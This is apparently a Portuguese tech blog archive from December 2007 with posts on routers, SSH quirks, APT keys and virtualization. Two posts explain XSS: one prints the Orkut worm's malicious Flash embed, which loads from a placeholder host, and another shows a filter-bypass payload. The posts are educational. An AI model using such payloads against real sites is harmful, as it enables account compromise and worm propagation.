domingo, dezembro 30, 2007

Feliz 2008

O Open Core vai de férias até dia 2, por isso aqui ficam os votos de um feliz 2008 a todos os leitores e amigos! O próximo ano promete :)

sábado, dezembro 29, 2007

Adicionar chaves GPG ao apt

Quando se adiciona um novo repositório ao APT no Ubuntu ou qualquer outro sistema operativo baseado em Debian, é necessário adicionar também a chave GPG correspondente ao repositório para saber a autencidade do mesmo. Senão for adicionada essa chave, o APT vai lançar um warning sempre que fizer actualização. Para evitar este warning basta então fazer o seguinte numa consola (estou a supor que já foi obtida a chave do repositório):

gpg --recv-key CHAVE && gpg -a --export CHAVE | sudo apt-key add -

Substituindo "CHAVE" pela chave correspondente ao repositório. Deverá depois aparecer na consola algum output e no fim se tudo correr bem o apt-key retorna um "OK".

Mais informação sobre o APT:
- http://wiki.debian.org/SecureApt

sexta-feira, dezembro 28, 2007

Hashing: Velocidade inimiga da segurança

Fica aqui um artigo bastante elucidativo sobre criptografia e como os algoritmos rápidos não são os mais indicados para guardar passwords devido a serem uma mais valia a nível de tempo computacional para um possível invasor ao tentar crackar essas mesmas passwords com um "dicionário".

quinta-feira, dezembro 27, 2007

Novo router

Não, não é um ovni. É o novo substituto do meu D-Link. É um Belkin F5D7633-4 e apesar de eu não conhecer muito bem a marca, passou os testes a que eu o submeti e tem um alcance wireless muito maior. Veio parar-me às mãos com um firmware já algo antigo, em poucos minutos fiz o upgrade e ficou tudo a funcionar às mil maravilhas.

Andei a cuscar um pouco o sistema operativo do bicho e também corre Linux. É sempre bom saber que o "pinguim" já anda pelos mais variados aparelhos.
Foi bastante fácil de configurar, com boa documentação cada opção a configurar, ficando apenas a nota negativa para o facto de para utilizadores avançados a interface não relevar o "sumo" das opções. Pormenor que se resolve acedendo ao router por SSH e mexer directamente nos ficheiros de configuração para dar os retoques finais.

Até agora tem-se portado bem e já não tenho os problemas que tinha com outro, vamos ver com o decorrer do tempo. Entretanto, vou tentar arranjar alguma utilidade para o D-Link.

quarta-feira, dezembro 26, 2007

terça-feira, dezembro 25, 2007

D-Link, D de desilusão


Se são donos de um D-Link DSL-G604T e usam um sistema operativo baseado em Unix, os meus pêsames. Este equipamento traz uma boa dose de bugs. O maior deles descobri hoje ao necessitar de me ligar por SSH a uma máquina externa através do Ubuntu.
Ao conectar aparecia a fingerprint do host, a seguir o prompt de login, mas assim que inseria os dados, o terminal bloqueava. Testei também no Mac OS, a mesma coisa. Até que me lembrei de testar com o Putty Portable que tenho na pen, e corri no Ubuntu através do Wine. Bingo! Funcionava. Nota mental: em Windows funciona.

Depois de alguma pesquisa na net percebi que era mesmo bug do router que não consegue tratar os pacotes cujo header venham com o ToS (Type of Service) a 0x10 (normal no cliente SSH em Unixes) e nem com umas actualizações de firmware lá foi.
A grande ironia da situação é que este router corre linux no firmware, mais propriamente um tal de Linux MontaVista, cá para mim é do segundo nome :P

Umas pesquisas mais tarde descobri que para o SSH funcionar teria de criar uma regra na iptables da máquina Linux:

iptables -t mangle -A OUTPUT -j DSCP --set-dscp 0x00


Esta solução não me convence, ter que alterar as configurações das máquinas para poder utilizar o protocolo. Além do mais, este não foi o único problema que notei neste equipamento. Qualquer ferramenta de rede usada em sistema Unix com este router fica extremamente lenta, um exemplo disso foi um Nmap que fiz a uma máquina interna e demorou tempo demais. O mesmo acontecia com sessões telnet e ftp que demoravam demasiado tempo a estabelecer comunicação.
Concluíndo: O mais provável é andar nos próximos tempos à procura de um router decente.

segunda-feira, dezembro 24, 2007

Boas Festas



O Open Core deseja aos seus leitores umas Boas Festas!

domingo, dezembro 23, 2007

Leitura para o Natal


Esta é a minha leitura para o Natal. É a primeira vez que leio um livro da série "For Dummies" e concerteza será a última, pois já comecei a ler e acho a abordagem do tema Ajax muito superficial. Por isso mesmo é que foi apenas alugado à biblioteca da faculdade.
Já o segundo livro, acabadinho de comprar, vai para a minha biblioteca pessoal. Dispensa apresentações. Depois de o ler faço uma pequena review.

sábado, dezembro 22, 2007

Orkut - Análise da falha XSS

Tal como prometido vou mostrar aqui o fucionamento do worm que infectou o Orkut aproveitando-se de uma falha entrentanto já corrigida pela Google.

Na realidade este worm não passava de código Javascript que se espalhava pelos profiles que chegassem até aos scraps (scrapbook) já alterados para contaminar.

O funcionamento era o seguinte:

Era colocado num scrap um post com HTML a embeber um objecto flash malicioso, por exemplo:

<object width="425" height="355"><param name="movie"
value="http://xpto.com/flash_malicioso.swf">
</param><param name="wmode" value="transparent">
</param><embed src="http://xpto.com/flash_malicioso.swf"
type="application/x-shockwave-flash"
wmode="transparent');>

Por sua vez, o flash carregava um ficheiro Javascript de seu nome virus.js que iria então efectuar os restantes "estragos", nomeadamente registar a vítima no grupo "Infectados Pelo Vírus do Orkut" e ainda mostrava uma mensagem sugestiva.

Aqui fica o código do virus.js para poderem verificar como é simples efectuar estes ataques. E apesar de XSS ser considerado um ataque menos creditado e associado a script-kiddies, a verdade é que são eficazes e podem provocar bastantes estragos, é só querer.

sexta-feira, dezembro 21, 2007

Orkut infectado com worm XSS

A Rede Social do Google, também conhecido como Orkut, foi infectada por um worm XSS.
Não será de grande admiração dado que este tipo de malware direccionado para a Web 2.0 encontra-se a crescer de forma bastante rápida, já que estas redes sociais acumulam bastante informação pessoal que é do interesse de um possível atacante.

Este worm explora uma vulnerabilidade XSS do Orkut, propagando-se depois através de e-mails enviados ou mensagens para os utilizadores, não sendo necessário sequer que estes clicassem num link qualquer para ficarem contaminados.
Apesar de tudo o worm é inofensivo apenas adiciona os utilizadores ao grupo "Infectados pelo vírus do Orkut" e mostra a seguinte mensagem em português às "vítimas":

"Isto foi só para mostrar que o Orkut é perigoso, vieram aqui parar sem sequer clicarem em link algum, tudo foi feito apenas a ler scraps. Não foram roubados quaisquer dados pessoais."

Os especialistas que verificaram o problema asseguram que não houve mesmo qualquer actividade maliciosa. Entretanto a Google já corrigiu a vulnerabilidade.

Num próximo post vou explicar em detalhe o funcionamento do worm e o seu código fonte.

quinta-feira, dezembro 20, 2007

Estou no Planetuga!

Pois é, agora além de estar aqui no sítio do costume, também poderão ver os meus posts no recém criado Planetuga.
O Planetuga é um agregador de blogs nacionais (também conhecido como planeta) onde podemos encontrar do melhor que se faz pelos blogs pessoais portugueses. Podem dar uma espreitadela em www.planetuga.com :)

Try Ruby!

artigo em http://blog.dev-pt.net

quarta-feira, dezembro 19, 2007

segunda-feira, dezembro 17, 2007

Fuzzing

informação sobre fuzz testing:
- http://en.wikipedia.org/wiki/Fuzz_testing
- http://pages.cs.wisc.edu/~bart/fuzz/

Virtual Box

Tenho andando muito longe do que se tem feito ultimamente a nível de virtualização, e só recentemente experimentei o VirtualBox no Ubuntu. Escusado será dizer que gostei bastante deste programa pois permite-me correr todos os live cds que tinha para aqui em formato ISO. Deste modo posso testar todas as distros novas que vão saindo e que sejam do meu interesse. Além do mais poderá igualmente correr qualquer sistema Windows (para quem tiver interessado).
Existe também uma versão deste software para Mac OS e ainda Windows. Aqui fica o link para a página do programa onde poderão fazer o download e ver alguns screenshots.

www.virtualbox.org

quarta-feira, dezembro 12, 2007

Literatura de telemóvel

Fiquei a conhecer através deste post num blog que costumo ler, a existência de um livro de seu título "Underground" que me pareceu bastante interessante (além de gratuito), e no seguimento desse post decidi experimentar o novo conceito de mobile literature, dado que o livro encontra-se disponível em formato txt, logo compatível com o meu telémovel.
Amanha já o vou começar a ler no comboio e se os meus olhos tolerarem, as viagens passarão a ser mais interessantes.

Update: O telemóvel não abriu o ficheiro do livro porque era demasiado grande. Dividi o ficheiro em várias partes... e cheguei à conclusão que não vale mesmo o trabalho :D

segunda-feira, dezembro 10, 2007

Wireless comprometido

Estava eu muito bem a trabalhar num projecto, ligado por VPN à faculdade quando depois de algum tempo idle no meu iBook recebo este aviso do Mac OS X: "The wireless network appears to have been compromised and will be disabled for about a minute."

A mensagem é alarmante e claro que inicialmente acreditei no sistema operativo e fui verificar o meu router se estava tudo ok. De seguida pesquisei pelo erro no google e chego à conclusão que é mesmo falso alarme e que este erro pode aparecer nas mais diversas ocasiões. No meu caso acontece sempre que fico muito tempo com a ligação VPN em idle. O software que estou a usar é o TunnelBlick.

domingo, dezembro 09, 2007

Technorati

Acabei de me inscrever no Technorati, não sei ainda as potencialidades deste serviço nos blogs, vamos ver se vale a pena. Entretanto aqui fica o link para o perfil: Technorati Profile

sexta-feira, dezembro 07, 2007

Asus Eee PC - Quero um destes para o Natal!


Esta pequena maravilha da tecnologia tem vindo a ser muito falada internacionalmente. Um portátil da Asus, ultra-leve, ultra-pequeno e para terminar em beleza, com Linux de raiz. Apesar de ser uma versão muito parecida com o XP (Xandros Linux).
Este pequeno portátil serve perfeitamente para o que eu pretendia e assim que chegar a Portugal (meados de Janeiro) vou comprar um.
Deixo aqui em baixo as especificações do brinquedo, e ainda aqui um video de uma review para o verem em acção.

Características:

Display : 7"
CPU & Chipset : Intel Mobile CPU & chipset
Operating System : Linux System/ Hardware Compatible with Windows XP
Communication : 10/100 Mbps Ethernet
WLAN : WiFi 802.11b/g
Memory : 512MB, DDR2
Storage : 4GB S.S.D. (Solid-State Disk)
Web-Cam : 0.3 Mega Pixel Video camera
Audio : Hi-Definition audio CODEC, Built-in stereo speaker, Built-in microphone
Keyboard : Qwerty UK keyboard
Expansion: 3 x USB ports
Battery Life : 3 hrs (4 cells)
Dimension & Weight : 22.5 x 16.4 x 2.15~3.5 cm, less than 1kg

Fica ainda aqui uma review bastante completa feita pelo Carlos Martins.

Update: Encontrei este site onde é possível testar a interface do Linux que vem no Eee PC.

quinta-feira, dezembro 06, 2007

XSS - Proteger com remendos não chega...

Imaginemos o site "xpto" que numa tentativa de se proteger contra ataques XSS filtra alguns inputs dos utilizadores, como por exemplo a função alert() do Javascript.
Fazendo alguns testes nesse site, verificamos que de facto o seguinte input não passa:

;alert("owned!");

Mas o seguinte já passa:

;alert"owned";

Este segundo input, do modo que está não faz rigorosamente nada. No entanto com um pequeno ajuste, mais especificamente apontadores de funções, conseguimos injectar a função alert() na mesma, ultrapassando o filtro do site:

;var xpto=alert;xpto("owned!");

Acontece que o site xpto não é imaginário, e existem muitos como ele por aí. E em vez de se perder tempo a bloquear uma das centenas de maneiras de iniciar um ataque, o ideal seria resolver o problema de raiz.

terça-feira, dezembro 04, 2007

Imagens com vida

Experimentem abrir um site com imagens, por exemplo uma pesquisa por imagens no google, e inserir o seguinte código javascript na barra URL e vejam o efeito :)

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Podem mudar os movimentos alterando os valores das funções.

Fonte

segunda-feira, dezembro 03, 2007

Standardizar o Windows

Se são utilizadores de sistemas operativos baseados em Unix (Linux, Mac OS, etc.) e ainda, se costumam utilizar a consola / terminal / linha de comandos, concerteza que já se depararam com a frustração que é escrever "ls" na linha de comandos do Windows. Pois ... , o comando não existe nesse sistema operativo. Em vez de "ls" para listar os ficheiros de uma directoria, a Microsoft decidiu complicar e escolher o belo comando "dir".
Ao fim de alguns dias com essa frustração no trabalho, onde tenho de usar Windows, e com alguma regularidade a linha de comandos, lembrei-me de uma pequena ideia que poderia ajudar.
Saquei o BloodShed DevC++, uma excelente IDE open-source com ferramentas GNU, para programar C e C++ em Windows e escrevi o seguinte código:

#include <stdio.h>

int main() {
system("dir");
return 0;
}


Gravei o ficheiro com o nome "ls.c", mandei o DevC++ compilar e voilá: "ls.exe" prontinho a usar. De seguida, dado que não tinha privilégios de Admin na máquina foi preciso adicionar ao PATH a pasta onde o novo ficheiro se encontrava, bastando para isso fazer numa linha de comandos:

path = %PATH%;%HOMEPATH%\pasta_que_tem_o_ficheiro


Se tivesse privilégios Admin na máquina bastaria apenas colocar o ficheiro na pasta C:\WINDOWS e estaria prontinho a funcionar.
Agora basta-me digitar o comando "ls" e a linha de comandos do Windows mostra logo o conteúdo da directoria onde me encontro (chamando o comando dir).

Há coisas fantásticas não há? :P

domingo, dezembro 02, 2007

Links

Encontrei este artigo muito interessante sobre segurança em redes wireless. Apesar de ser um pouco antigo, explica de um modo resumido as opções básicas de segurança e as possíveis hipóteses de as ultrapassar.

http://forskningsnett.uninett.no/wlan/wlanthreat.html